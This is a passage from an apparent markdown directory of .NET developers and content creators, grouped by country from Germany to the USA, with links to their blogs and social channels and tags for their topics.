[LinkedIn](https://www.linkedin.com/in/laurentkempe/) | .NET, C#, WebAssembly | | Pierre Belin | [Blog](https://goatreview.com/), [LinkedIn](https://www.linkedin.com/in/pierre-belin/) | .NET, Akka.NET | | Martin Finkel | [Blog](https://mfkl.github.io), [Twitter](https://twitter.com/martz2804), [LinkedIn](https://www.linkedin.com/in/martin-finkel-a9368571/), [Bio.Link](https://bio.link/mfkl) | NET, Architecture | ### Germany <img src="4x3/de.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Holger Schwichtenberg | [Twitter](https://twitter.com/DOTNETDOKTOR) | .NET, C# | | Julian Ewers-Peters | [Blog](https://ewerspej.hashnode.dev), [LinkedIn](https://linkedin.com/in/jewerspeters) | .NET, C#, MVVM, .NET MAUI, Xamarin.Forms | | Patrick God | [Twitter](https://twitter.com/_PatrickGod), [YouTube](https://www.youtube.com/c/PatrickGod) | .NET, C#, ASP.NET Core, Blazor, EF Core | | Thomas Claudius Huber | [Pluralsight](https://app.pluralsight.com/profile/author/thomas-huber), [Twitter](https://twitter.com/thomasclaudiush) | .NET, C#, Blazor, WinUI 3 | | Tim Cadenbach | [Blog](https://www.tcdev.de/blog), [Twitter](https://twitter.com/timcadenbach) | .NET Core, ASP.NET Core | ### Greece <img src="4x3/gr.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Spyros Katsios | [YouTube](https://www.youtube.com/@spyroskatsios) | .NET, C# | ### India <img src="4x3/in.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Abdul Rahman | [Site](https://www.ilovedotnet.org), [LinkedIn](https://www.linkedin.com/in/fingers10/) | C#, .NET | | Aditya Oberai | [Twitter](https://twitter.com/adityaoberai1), [LinkedIn](https://www.linkedin.com/in/adityaoberai1/), [Videos](https://oberai.dev/videos), [Blog](https://dev.to/adityaoberai/) | .NET, ASP.NET Web APIs, .NET MAUI, Azure | | Anto Subash | [YouTube](https://www.youtube.com/c/AntoSubash), [Blog](https://blog.antosubash.com), [Twitter](https://twitter.com/antosubash) | .NET, Docker, ABP Framework | | Anurag Sinha | [Blog](https://techncodetools.com/blog/), [Twitter](https://twitter.com/awesomeanurag) | C#, .NET | | Bhrugen Patel | [YouTube](https://www.youtube.com/user/bhrugen1990), [Courses](https://www.dotnetmastery.com/) | .NET, ASP.NET Core, Blazor | | Mukesh Murugan | [Blog](https://codewithmukesh.com/blog), [Twitter](https://twitter.com/iammukeshm), [LinkedIn](https://www.linkedin.com/in/iammukeshm/) | .NET, AWS | | Nouman Rahman | [Blog](https://programmingfire.com), [Twitter](https://twitter.com/programmingfire) | .NET, C# | | Saineshwar Bageri | [Blog](https://tutexchange.com), [Twitter](https://twitter.com/saihacksoft) | .NET, ASP.NET Core | | Shailendra Chauhan | [YouTube](https://www.youtube.com/channel/UCuYuSB7JzDslrwwh8EM-4JA), [Twitter](https://twitter.com/proshailendra) | .NET, ASP.NET Core | | Shivprasad Koirala | [YouTube](https://www.youtube.com/c/questpondvideos), [Twitter](https://twitter.com/questpond) | C#, .NET | | Shreyas Jejurkar | [Blog](https://shreyasjejurkar.com) | .NET, ASP.NET Core | | Tarun Saini | [YouTube](https://www.youtube.com/c/ASPNETMVCCORE), [Twitter](https://twitter.com/onetarun) | .NET, ASP.NET Core | | Zahiruddin Tavargere | [Twitter](https://twitter.com/zahiruddin_t), [Blog](https://zahere.com/) | .NET, C# | ### Iran <img src="4x3/ir.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Meysam Hadeli | [GitHub](https://github.com/meysamhadeli), [Twitter](https://twitter.com/meysamhadeli), [Blog](https://meysamhadeli.com) | Microservices, .NET, ASP.NET Core | | Mehdi Hadeli | [GitHub](https://github.com/mehdihadeli), [Twitter](https://twitter.com/mehdi_hadeli), [Blog](https://www.mehdihadeli.com/), [Blog RSS](https://www.mehdihadeli.com/rss) | Architecture, .NET, ASP.NET Core | | Mohsen Rajabi | [GitHub](https://github.com/EngRajabi), [Twitter](https://twitter.com/mohsen_rajabi72), [Blog](https://medium.com/@mohsen_rajabi) | Microservices, .NET, ASP.NET Core, C# | Omid Ahmadpour | [GitHub](https://github.com/omid-ahmadpour), [LinkedIn](https://www.linkedin.com/in/omid-ahmadpour/), [YouTube](https://www.youtube.com/@withcodess), [Blog](https://medium.com/@omid-ahmadpour) | Microservices, .NET, C#, Clean Architecture, Clean Code, Azure | | Saeed Esmaeelinejad | [LinkedIn](https://www.linkedin.com/in/saeed-esmaeelinejad/) | C#, EF, SQL Server, ASP.NET | ### Ireland <img src="4x3/ie.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Camilo Terevinto | [Blog](https://www.camiloterevinto.com), [LinkedIn](https://www.linkedin.com/in/camiloterevinto/), [Twitter](https://twitter.com/CTerevinto), [Blog RSS](https://www.camiloterevinto.com/rss.xml) | C#, ASP.NET Core, Azure | | Dave Callan | [LinkedIn](https://www.linkedin.com/in/davidcallan/), [Twitter](https://twitter.com/DaveCallanIE) | C#, .NET, Visual Studio | | Dominic Frei | [LinkedIn](https://www.linkedin.com/in/dominicfrei/), [Twitter](https://twitter.com/dominicfrei), [GitHub](https://github.com/DominicFrei), [Blog](https://www.mongodb.com/developer/author/dominic-frei/) | .NET, C#, Blazor, Unity3D, MongoDB | ### Israel <img src="4x3/il.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Amichai Mantinband | [YouTube](https://www.youtube.com/c/AmichaiMantinband/), [Twitter](https://twitter.com/amantinband/), [LinkedIn](https://www.linkedin.com/in/amantinband/) | .NET, ASP.NET Core | ### Italy <img src="4x3/it.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Andrea Chiarelli | [Blog](https://andreachiarelli.it/), [Twitter](https://twitter.com/andychiare), [LinkedIn](https://www.linkedin.com/in/andreachiarelli/) | .NET, C# | | Andrea Tosato | [Mastering Minimal APIs in ASP.NET Core (Book)](https://www.packtpub.com/product/mastering-minimal-apis-in-aspnet-core/9781803237824), [LinkedIn](https://www.linkedin.com/in/andreatosato/), [Twitter](https://twitter.com/ATosato86) | .NET, C#, ASP.NET Core | Davide Bellone | [Blog](https://www.code4it.dev), [Twitter](https://twitter.com/BelloneDavide), [LinkedIn](https://www.linkedin.com/in/bellonedavide/) | .NET | | Fabio Ramoni | [Twitter](https://twitter.com/developer_fabio), [Twitter Threads (GitHub)](https://github.com/FabioDeveloper92/developer_fabio_twitter_threads) | .NET, SQL | | Marco Minerva | [Mastering Minimal APIs in ASP.NET Core (Book)](https://www.packtpub.com/product/mastering-minimal-apis-in-aspnet-core/9781803237824), [LinkedIn](https://www.linkedin.com/in/marcominerva/), [Twitter](https://twitter.com/marcominerva) | .NET, C#, ASP.NET Core | Renato Golia | [Blog](https://renatogolia.com/), [Twitter](https://twitter.com/Kralizek), [LinkedIn](https://www.linkedin.com/in/renatogolia/), [GitHub](https://github.com/Kralizek), [Mastodon](https://dotnet.social/@rengol) | .NET, ASP.NET Core, AWS, Serverless, Architecture, Infrastructure-as-Code, CI/CD | ### Jamaica <img src="4x3/jm.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Trevoir Williams | [YouTube](https://www.youtube.com/c/trevoirwilliams), [LinkedIn](https://www.linkedin.com/in/trevoirwilliams/), [Blog](https://www.trevoirwilliams.com/), [Udemy Profile](https://www.udemy.com/user/trevoirwilliams/) | .NET, ASP.NET Core, Azure, .NET MAUI | ### Japan <img src="4x3/jp.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Andrew KeepCoding | [YouTube](https://www.youtube.com/c/AndrewKeepCoding/), [Twitter](https://twitter.com/AndrewKeepCodin) | WinAppSDK, WinUI 3 | | Ted Andersen | [YouTube](https://www.youtube.com/c/TedsTech), [Twitter](https://twitter.com/TedsTechTed) | .NET, C# | ### Kosovo <img src="4x3/xk.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Ledjon Behluli | [Blog](https://www.ledjonbehluli.com/), [Twitter](https://twitter.com/BehluliLedjon), [LinkedIn](https://www.linkedin.com/in/msc-ledjon-behluli-06b523155/) | .NET, C#, Architecture | ### Lebanon <img src="4x3/lb.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Ahmad Mozaffar | [YouTube](https://www.youtube.com/channel/UCRs-PO48PbbS0l7bBhbu5CA), [Twitter](https://twitter.com/ahmadmozaffar99) | .NET, Azure | | Hasan Aboul | [YouTube](https://www.youtube.com/channel/UCiLmLn593TxhOLpvbOfJFRg/featured), [YouTube](https://www.youtube.com/c/heducate) [Blog](https://learnwithhasan.com), [Twitter](https://twitter.com/h_educate) | .NET | ### Malawi <img src="4x3/mw.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Simuzeche Kaluwa | [YouTube](https://www.youtube.com/channel/UCQw4zDb735eezImafcyYlWg), [Twitter](https://twitter.com/simuzeche) | .NET, ASP.NET Core | ### Mauritius <img src="4x3/mu.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Patrick Smacchia | [Blog](https://blog.ndepend.com), [Twitter](https://twitter.com/ndepend), [LinkedIn](https://www.linkedin.com/in/patrick-smacchia-b0123110/) | .NET, C#, Architecture, ndepend | ### Netherlands <img src="4x3/nl.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Albert Starreveld | [Blog](https://medium.com/@abstarreveld), [LinkedIn](https://www.linkedin.com/in/albert-starreveld/) | .NET, Azure, C# | | Erwin Staal | [Blog](https://erwinstaal.nl/), [Twitter](https://twitter.com/erwin_staal) | DevOps, Azure | | Fanie Reynders | [YouTube](https://youtube.com/faniereynders), [Twitch](https://twitch.tv/faniereynders), [Blog](https://reynders.co/blog/), [Twitter](https://twitter.com/FanieReynders) | .NET, Azure | | Fons Sonnemans | [Blog](https://reflectionit.nl/blog), [Twitter](https://twitter.com/fonssonnemans), [GitHub](https://github.com/sonnemaf) | C#, .NET, ASP.NET, WinUI | | Geert van der Cruijsen | [Blog](https://fullcycledeveloper.com/), [Twitter](https://twitter.com/geertvdc) | DevOps, Azure | | Gerald Versluis | [YouTube](https://www.youtube.com/c/GeraldVersluis), [Blog](https://blog.verslu.is/), [Twitter](https://twitter.com/jfversluis) | .NET MAUI, Blazor, C# | | Henrique Siebert Domareski | [Blog](https://henriquesd.medium.com), [LinkedIn](https://www.linkedin.com/in/henriquesd) | .NET, Azure | | Louรซlla Creemers | [Blog](https://lovelacecoding.hashnode.dev/), [Twitter](https://twitter.com/lovelacecoding), [Bio.Link](https://bio.link/lovelacecoding) | .NET, C#, Architecture | Marc Duiker | [YouTube](https://www.youtube.com/c/marcduiker-serverless), [Blog](https://blog.marcduiker.nl), [Twitter](https://twitter.com/marcduiker) | Azure Functions, Serverless | | Max Hamulyรกk | [Blog](https://kaylumah.nl/blog), [Mastodon](https://fosstodon.org/@kaylumah@mastodon.nl), [Twitter](https://twitter.com/kaylumah), [LinkedIn](https://www.linkedin.com/in/maxhamulyak/) | .NET, C# | | Michiel van Oudheusden | [Blog](https://mindbyte.nl/), [Mastodon](https://mastodon.social/@mivano), [Twitter](https://www.twitter.com/mivano), [LinkedIn](https://www.linkedin.com/in/michielvanoudheusden), [Newsletter](https://mindbyte.beehiiv.com) | Azure, GitHub, ALM, Remote Work | | Rob Bos | [Blog](https://devopsjournal.io/), [Mastodon](https://fosstodon.org/@Rob_Bos@mstdn.social), [LinkedIn](https://www.linkedin.com/in/bosrob/), [GitHub](https://github.com/rajbos) | DevOps, GitHub | | Roland Guijt | [Pluralsight](https://app.pluralsight.com/profile/author/roland-guijt), [Twitter](https://twitter.com/rolandguijt), [LinkedIn](https://www.linkedin.com/in/rolandguijt) | .NET, ASP.NET Core | | Stacy Cashmore | [Twitter](https://twitter.com/Stacy_Cash), [Mastodon](https://tech.lgbt/@StacyClouds), [Beginning Static Web Apps with Blazor (Book)](https://link.springer.com/book/10.1007/978-1-4842-8146-8), [Blog](https://www.stacy-clouds.net/blog-posts) | .NET, Azure Static Web Apps | ### New Zealand <img src="4x3/nz.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Jakub Chodounskรฝ | [Newsletter (csharpdigest.net)](https://csharpdigest.net/), [Twitter](https://twitter.com/jakubgarfield), [Blog](https://chodounsky.com/) | .NET| ### North Macedonia <img src="4x3/mk.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Bojan Veljanovski | [Blog](https://bojanveljanovski.com/), [LinkedIn](https://www.linkedin.com/in/bojanv91/) | .NET, C#, SQL | ### Norway <img src="4x3/no.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Andreas Nesheim | [Blog](https://www.andreasnesheim.no/), [Twitter](https://twitter.com/AndreasNesheim), [LinkedIn](https://www.linkedin.com/in/andreas-nesheim/) | .NET MAUI, Xamarin | Kris Devochko | [Blog](https://kristhecodingunicorn.com/post/), [Twitter](https://twitter.com/kristhecodingu1), [LinkedIn](https://www.linkedin.com/in/krisde/) | Azure, Kubernetes | ### Pakistan <img src="4x3/pk.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Muhammad Waseem | [.NET Newsletter](https://mwaseemzakir.substack.com/), [Twitter](https://twitter.com/mwaseemzakir), [LinkedIn](https://www.linkedin.com/in/mwaseemzakir/), [Facebook](https://facebook.com/IamMuhammadWaseemZakir), [Medium](https://medium.com/@mwaseemzakir)| .NET, C# , Entity Framework | ### Philippines <img src="4x3/ph.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Satya Karki | [Blog](https://rijsat.com/), [LinkedIn](https://www.linkedin.com/in/satya-karki-a506b473/), [YouTube](https://www.youtube.com/@RijSat) | .NET, C# | | Rijwan Ansari | [Blog](https://rijsat.com/), [LinkedIn](https://www.linkedin.com/in/rijwanansari/), [Twitter](https://twitter.com/rijsat), [YouTube](https://www.youtube.com/@RijSat) | .NET, C# | ### Poland <img src="4x3/pl.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Szymon Kulec | [Blog](https://blog.scooletz.com/), [Twitter](https://twitter.com/Scooletz), [LinkedIn](https://www.linkedin.com/in/szymon-kulec/) | .NET, C# | | Oleg Kyrylchuk | [Blog](https://blog.okyrylchuk.dev/), [Twitter](https://twitter.com/okyrylchuk), [LinkedIn](https://www.linkedin.com/in/okyrylchuk/) | .NET, C# | | Oskar Dudycz | [Blog](https://event-driven.io/en/), [Twitter](https://twitter.com/oskar_at_net), [LinkedIn](https://www.linkedin.com/in/oskardudycz/), [Mastodon](https://hachyderm.io/@oskardudycz) | .NET, Event-Driven Architecture | ### Portugal <img src="4x3/pt.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Antรฃo Almada | [Blog](https://antao-almada.medium.com/), [LinkedIn](https://www.linkedin.com/in/antaoalmada/) | .NET, C# | | Guilherme Ferreira | [Blog](https://gsferreira.com), [YouTube](https://www.youtube.com/user/guilhermeasferreira), [Twitter](https://twitter.com/gsferreira), [LinkedIn](https://www.linkedin.com/in/gferreira/) | .NET, C#, Architecture | | Joรฃo Antunes | [YouTube](https://www.youtube.com/c/CodingMilitia), [Twitter](https://twitter.com/joaofbantunes), [Blog](https://blog.codingmilitia.com), [LinkedIn](https://www.linkedin.com/in/joaofbantunes/), [Mastodon](https://mastodon.social/@joaofbantunes) | .NET, C# | ### Romania <img src="4x3/ro.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Dan Patrascu-Baba | [YouTube](https://www.youtube.com/channel/UCyTPru-1gZ7-4qblcKM0TiQ), [Twitter](https://twitter.com/danpdc), [LinkedIn](https://www.linkedin.com/in/dan-patrascu-baba-08b78523/) | .NET, C# | | Irina Scurtu | [Blog](https://irina.codes/), [Twitter](https://twitter.com/irina_scurtu), [GitHub](https://github.com/irinascurtu), [LinkedIn](https://www.linkedin.com/in/irinascurtu/) | .NET, C# | | Valentin Anghel | [Blog](https://programmingcsharp.com/), [Twitter](https://twitter.com/sharpprograming) | .NET, C# | ### Serbia <img src="4x3/rs.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Marinko Spasojevic | [Blog](https://code-maze.com/), [LinkedIn](https://www.linkedin.com/in/marinko-spasojevic-95bb023b/) | .NET, ASP.NET Core, Blazor, C# | | Dr. Milan Milanoviฤ‡ | [LinkedIn](https://www.linkedin.com/in/milanmilanovic/), [Blog](https://milan.milanovic.org/post/), [Twitter](https://twitter.com/milan_milanovic), [Newsletter](https://newsletter.techworld-with-milan.com/) | .NET, C#, Azure, Architecture | | Milan Jovanoviฤ‡ | [Blog](https://www.milanjovanovic.tech/blog), [LinkedIn](https://www.linkedin.com/in/milan-jovanovic), [YouTube](https://www.youtube.com/c/MilanJovanovicTech), [Twitter](https://twitter.com/mjovanovictech) | .NET, C#, Architecture | | Stefan Djokic | [LinkedIn](https://www.linkedin.com/in/djokic-stefan/), [Twitter](https://twitter.com/TheCodeMan__), [Blog](https://www.exlrt.com/blog?a=stefan-djokic) | .NET, C#, Architecture, EntityFramework | | Zoran Horvat | [Twitter](https://twitter.com/zoranh75), [Blog](https://codinghelmet.com/articles), [YouTube](https://www.youtube.com/c/zh-code) | .NET, C#, Architecture | ## South Africa <img src="4x3/za.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Ivan Kahl | [Site](https://ivankahl.com/), [Blog](https://blog.ivankahl.com/), [YouTube](https://www.youtube.com/c/IvanKahl), [Twitter](https://twitter.com/IvanKahl) | .NET, C# ### Sweden <img src="4x3/se.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Alan Smith | [YouTube](https://www.youtube.com/c/CloudCastsAlanSmith), [Twitter](https://twitter.com/alansmith) | Azure AI | | Daniel Hindrikes | [Twitter](https://twitter.com/hindrikes), [YouTube](https://www.youtube.com/c/DanielHindrikes), [Blog](https://danielhindrikes.se/) | .NET MAUI, Blazor, Azure | | Jessica Engstrom | [Podcast](https://www.codingafterwork.com/), [Twitter](https://twitter.com/engstromjess), [Twitch](https://www.twitch.tv/codingafterwork) | .NET, Blazor, Podcast | | Jimmy Engstrรถm | [Podcast](https://www.codingafterwork.com/), [Twitter](https://twitter.com/EngstromJimmy), [Blog](https://engstromjimmy.com/) | .NET, Blazor, Podcast | | Jonah Andersson | [Twitter](https://twitter.com/cjkodare), [Linktree](https://linktr.ee/jonahandersson), [Blog](https://jonahandersson.tech/blog/) | .NET, C#, Azure | | Simon Wรฅhlin | [Twitter](https://twitter.com/SimonWahlin), [YouTube](https://www.youtube.com/c/SimonAutomates), [Blog](https://blog.simonw.se/) | PowerShell, Azure | ### Switzerland <img src="4x3/ch.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Claudio Bernasconi | [YouTube](https://youtube.com/claudiobernasconi), [Twitter](https://twitter.com/CHBernasconiC), [Blog](https://www.claudiobernasconi.ch/) | .NET, .NET MAUI | | Damien Bowden | [Blog](https://damienbod.com), [Twitter](https://twitter.com/damien_bod) | ASP.NET Core, OpenID Connect, OAuth | | Emanuele Bartolesi | [Blog](https://dev.to/kasuken), [Blog RSS](https://dev.to/feed/kasuken), [Twitter](https://twitter.com/kasuken), [Mastering Minimal APIs in ASP.NET Core (Book)](https://www.packtpub.com/product/mastering-minimal-apis-in-aspnet-core/9781803237824) | .NET, Blazor, Azure | | Marco Siccardi | [Blog](https://msicc.net/), [Mastodon](https://mastodon.social/@msicc), [LinkedIn](https://www.linkedin.com/in/msicc/) | .NET, C#, Xamarin | Matthias Gรผntert | [Blog](https://www.azureblue.io/), [LinkedIn](https://www.linkedin.com/in/matthiasguentert/) | Azure, ASP.NET Core | | Matthias Jost | [Blog](https://www.matthias-jost.ch/en/), [LinkedIn](https://www.linkedin.com/in/matthias-jost/), [Twitter](https://twitter.com/jost0101), [Bio Link](https://matthiasjost.bio.link/) | .NET, C# | Jรผrgen Gutsch | [Blog](https://asp.net-hacker.rocks), [Twitter](https://twitter.com/sharpcms/) | ASP.NET Core | | Steven Giesel | [Blog](https://steven-giesel.com), [LinkedIn](https://www.linkedin.com/in/steven-giesel/) | .NET, C#, Blazor | | Wolfgang Ofner | [Blog](https://programmingwithwolfgang.com/), [LinkedIn](https://www.linkedin.com/in/wolfgangofner/), [Twitter](https://twitter.com/wolfgang_ofner) | Azure, Kubernetes | ### Turkey <img src="4x3/tr.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Berkan Sasmaz | [Blog](https://berkansasmaz.com/), [Twitter](https://twitter.com/berkansasmazz), [LinkedIn](https://www.linkedin.com/in/berkansasmaz/) | ABP Framework, .NET, Architecture | | Engincan Veske | [Blog](https://engincanv.github.io/), [Twitter](https://twitter.com/EngincanVeske), [LinkedIn](https://www.linkedin.com/in/engincanv/) | ABP Framework, .NET, C# | | Furkan Gรถzรผkara | [YouTube](https://www.youtube.com/SECourses), [Twitter](https://twitter.com/gozukarafurkan), [LinkedIn](https://www.linkedin.com/in/furkangozukara/) | .NET, C# | Okan Can KaradaฤŸ | [Blog](https://okankaradag.com/en/), [LinkedIn](https://www.linkedin.com/in/okancankaradag/) | .NET, C# | ### Ukraine <img src="4x3/ua.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Oleksii Nikiforov | [Blog](https://nikiforovall.github.io), [Twitter](https://twitter.com/nikiforovall), [LinkedIn](https://www.linkedin.com/in/nikiforov-oleksii/) | .NET, C#, ASP.NET | | Vladislav Antonyuk | [Blog](https://vladislavantonyuk.github.io), [LinkedIn](https://www.linkedin.com/in/vladislav-antonyuk) | .NET, C#, .NET MAUI, Blazor, Azure | ### United Kingdom (A-J) <img src="4x3/gb.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Andrea Angella | [Blog](https://www.productivecsharp.com/blog/), [Site](https://www.productivecsharp.com/), [LinkedIn](https://www.linkedin.com/in/andreaangella/), [YouTube](https://www.youtube.com/c/AndreaAngella), [Twitter](https://twitter.com/angella_andrea) | .NET, C# | | Andrew Lock | [Blog](https://andrewlock.net/), [Twitter](https://twitter.com/andrewlocknet), [LinkedIn](https://www.linkedin.com/in/andrewdlock/), [Mastodon](https://hachyderm.io/@andrewlock) | .NET, C#, ASP.NET Core | | Anton Wieslander | [YouTube](https://www.youtube.com/c/RawCoding), [Twitter](https://twitter.com/anton_t0shik), [GitHub](https://github.com/T0shik) | .NET, C#, ASP.NET Core | | Chris Sainty | [Twitter](https://twitter.com/chris_sainty), [Blog](https://chrissainty.com/), [Blazor in Action (Book)](https://bit.ly/blazorinaction), [Mastodon](https://mstdn.social/@chrissainty) | Blazor | Dan Clarke | [Blog](https://www.danclarke.com/), [Podcast](https://unhandledexceptionpodcast.com/), [YouTube](https://www.youtube.com/@danclarkeuk), [Twitter](https://twitter.com/dracan), [Mastodon](https://mstdn.social/@danclarke) | Podcast, .NET| | Dave Murray | [Blog](https://blog.taranissoftware.com/), [LinkedIn](https://www.linkedin.com/in/dave-murray-glasgow/), [Mastodon](https://mastodon.scot/@irongut) | Xamarin | | David Grace | [Blog](https://www.roundthecode.com/), [YouTube](https://www.youtube.com/roundthecode), [Twitter](https://twitter.com/roundthecode) | .NET, C#, ASP.NET Core | | Dustin Moris Gorski | [Blog](https://dusted.codes/), [Twitter](https://twitter.com/dustinmoris), [LinkedIn](https://www.linkedin.com/in/dustinmoris/) | .NET, C#, ASP.NET Core | | Gavin Lon | [YouTube](https://www.youtube.com/c/GavinLon/), [GitHub](https://github.com/gavinlondigital) | .NET, Blazor | | James Eastham | [YouTube](https://www.youtube.com/channel/UCutBMcgLfbSfRL-MB5Bskxg), [Site](https://serverlessdotnet.dev/), [Blog](https://jameseastham.co.uk/), [Mastodon](https://hachyderm.io/@plantpowerjames), [LinkedIn](https://www.linkedin.com/in/james-eastham/) | AWS, Serverless, .NET, C# | | Jamie Maguire | [Blog](https://jamiemaguire.net/), [Twitter](https://twitter.com/jamie_maguire1), [LinkedIn Learning](https://www.linkedin.com/learning/instructors/jamie-maguire), [LinkedIn](https://www.linkedin.com/in/jamiemaguiredotnet/) | Azure AI, .NET| | Jamie Taylor | [Podcast](https://dotnetcore.show), [Twitter](https://twitter.com/dotnetcoreshow/), [YouTube](https://www.youtube.com/c/JamieTaylorDotNetCore/videos) | Podcast, .NET| | Jasper Kent | [YouTube](https://www.youtube.com/@CodingTutorialsAreGo), [Twitter](https://twitter.com/LastOprichnik), [LinkedIn](https://www.linkedin.com/in/jasper-kent-48a976104/) | .NET, C# | John Reilly | [Blog](https://blog.johnnyreilly.com), [Twitter](https://twitter.com/johnny_reilly), [Mastodon](https://fosstodon.org/@johnny_reilly) | .NET| | Jon Hilton | [Blog](https://jonhilton.net/), [Courses](https://practicaldotnet.io), [Twitter](https://twitter.com/jonhilt) | Blazor, .NET | | Jon P Smith | [Blog](https://www.thereformedprogrammer.net), [Twitter](https://twitter.com/thereformedprog) | ASP.NET Core, EF Core | | Jon Skeet | [Blog](https://codeblog.jonskeet.uk/), [Twitter](https://twitter.com/jonskeet), [Book](https://csharpindepth.com/), [StackOverflow](https://stackoverflow.com/users/22656/jon-skeet) | .NET, C# | ### United Kingdom (K-Z) <img src="4x3/gb.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Carl Sargunar | [Github](https://github.com/CarlSargunar), [Twitch](https://www.twitch.tv/carlcod_es), [Twitter](https://twitter.com/carlcod_es), [LinkedIn](https://www.linkedin.com/in/carl-sargunar-63b5814/), [Site](https://carlcod.es/) | .NET, C#, Docker, Umbraco, Maui | | Layla Porter | [Twitch](https://www.twitch.tv/laylacodesit), [Twitter](https://twitter.com/LaylaCodesIt), [LinkedIn](https://www.linkedin.com/in/layla-porter), [Site](https://www.layla.dev/) | .NET, C# | | Luke Malpass | [YouTube](https://youtube.com/c/angelsix), [GitHub](https://github.com/angelsix), [Twitter](https://twitter.com/angelsixuk) | .NET, C#, Avalonia UI, WPF | | Mark Heath | [Pluralsight](https://app.pluralsight.com/profile/author/mark-heath), [Blog](https://markheath.net), [Twitter](https://twitter.com/mark_heath) | .NET, ASP.NET Core, Azure | | Mark Oliver | [Twitter](https://twitter.com/MicbOliver), [Blog](https://blog.markoliver.website/), [Blog RSS](https://blog.markoliver.website/rss.xml), [LinkedIn](https://www.linkedin.com/in/profileformarkoliver/) | C#, .NET | Micheal Colhoun | [Blog](https://colhountech.com/blog/), [Twitter](https://twitter.com/colhountech), [YouTube](https://www.youtube.com/channel/UC-mHR47cULEfJHvk49t1zQA/videos) | .NET, C#, Azure | Mike Brind | [Twitter](https://twitter.com/mikesdotnetting), [Blog](https://www.mikesdotnetting.com/), [LinkedIn](https://www.linkedin.com/in/mike-brind/) | C#, .NET | | Mike Irving | [Blog](https://www.mike-irving.co.uk), [GitHub](https://github.com/mikeirvingweb), [Twitter](https://twitter.com/mikeirvingweb) | .NET, C#, Mobile | | Mohamad Lawand | [YouTube](https://www.youtube.com/c/MohamadLawand), [Blog](https://dev.to/moe23), [Twitter](https://twitter.com/Moe23) | ASP.NET Core, .NET | | Nick Chapsas | [YouTube](https://www.youtube.com/c/Elfocrash), [Site](https://nickchapsas.com/), [Twitter](https://twitter.com/nickchapsas), [GitHub](https://github.com/Elfocrash) | .NET, C# | | Paul Michaels | [Twitter](https://twitter.com/paul_michaels), [Blog](https://pmichaels.net/) | .NET, C#, Architecture | | Peter Foot | [Blog](https://inthehand.com/blog), [GitHub](https://github.com/peterfoot), [Twitter](https://twitter.com/peterfoot) | .NET, C#, Mobile | | Peter Morris | [Site](https://blazor-university.com), [Twitter](https://twitter.com/MrPeterLMorris), [GitHub](https://github.com/mrpmorris/) | Blazor | Poornima Nayar | [Blog](https://poornimanayar.co.uk/), [Twitter](https://twitter.com/PoornimaNayar), [GitHub](https://github.com/poornimanayar) | .NET, C# | Scott Wlaschin | [Site](https://fsharpforfunandprofit.com), [Twitter](https://twitter.com/ScottWlaschin) | F# | | Steve Gordon | [Pluralsight](https://app.pluralsight.com/profile/author/steve-gordon), [Twitter](https://twitter.com/stevejgordon), [Blog](https://www.stevejgordon.co.uk/), [Mastodon](https://fosstodon.org/@stevejgordon) | .NET, C# | | Stuart Blackler | [YouTube](https://www.youtube.com/c/CodeWithStu/videos), [LinkedIn](https://www.linkedin.com/in/im5tu/), [Blog](https://im5tu.io/article/), [Twitter](https://twitter.com/CodeWithStu) | .NET, C# | ### USA (A-F) <img src="4x3/us.svg" height="35"> | Name | Channels | Tags | | --- | --- | --- | | Adnan Rafiq | [Blog](https://adnanrafiq.com/blog/), [Mastodon](https://hachyderm.io/@adnanrafiq) | .NET, C#, SQL | | Brendan Enrick | [YouTube](https://www.youtube.com/c/DevChatter/), [Blog](https://brendoneus.com/), [Twitch](https://www.twitch.tv/DevChatter), [Twitter](https://twitter.com/brendoneus) | .NET, C#, ASP.NET Core | | Bryan Hogan | [Podcast](https://nodogmapodcast.bryanhogan.net/), [Blog](https://nodogmablog.bryanhogan.net/), [Twitter](https://twitter.com/bryanjhogan), [LinkedIn](https://www.linkedin.com/in/bryanjhogan/) | .NET, Podcast | | Chris Patterson | [YouTube](https://www.youtube.com/c/PhatBoyG), [Twitter](https://twitter.com/PhatBoyG), [LinkedIn](https://www.linkedin.com/in/chrispatterson/) | MassTransit | | Chris Woodruff | [Blog](https://woodruff.dev/), [LinkedIn](https://www.linkedin.com/in/chriswoodruff/), [Twitter](https://twitter.com/cwoodruff), [Mastodon](https://mastodon.social/@cwoodruff) | .NET, C#, Web APIs, EFCore, MSSQL | | Carl Franklin | [Podcast](https://www.dotnetrocks.com/), [BlazorTrain YouTube](https://www.youtube.com/playlist?list=PL8h4jt35t1wjvwFnvcB2LlYL4jLRzRmoz), [Twitter](https://twitter.com/carlfranklin) | Blazor | | Caleb Wells | [Twiter](https://twitter.com/calebwellscodes), [Podcast](https://topenddevs.com/podcasts/adventures-in-net) | .NET, C# | David McCarter | [Blog](https://dotnettips.wordpress.com/), [Live 